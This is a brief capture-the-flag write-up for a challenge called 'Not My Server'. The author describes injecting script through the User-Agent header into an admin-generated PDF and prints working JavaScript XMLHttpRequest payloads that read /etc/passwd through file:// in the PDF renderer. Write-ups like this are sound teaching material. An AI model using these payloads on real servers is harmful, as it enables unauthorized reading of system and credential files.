1337UP CTF - Not My Server

chall : Not my server

Description : Wait, you’re an admin? Well, what can you do now?

Well, It was the continuation of Getting admin access challenge.I logged in as admin and i noticed there was an functionality generates the PDF which contains the previous logins username,Date and time , User-Agent strings.


I crafted a html tags in User-agent strings while logging in and it reflects in the PDF and it also vulnerable to SSRF !!.


I want to know which protocol they used to save files and i used this payload to print file location

 Location : file:///tmp/wktemp-a5227fe0-e5d3-4ecb-a055-1f38964c02e2.html

They used file:/// protocal and i tried iframe to render the /etc/passwd file but it failed.I used XHR requests but it also failed

 <script>exfil = new XMLHttpRequest();exfil.open("GET","file:///etc/passwd"); exfil.send();exfil.onload = function(){document.write(this.responseText);} exfil.onerror = function(){document.write('failed!')}</script>

My teammate 0xGodson helped me to solve this chall.He sent a payload which was working like a king!!

 <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

And I can able to read the /etc/passwd file!!!


Finally, The flag is in file:///flag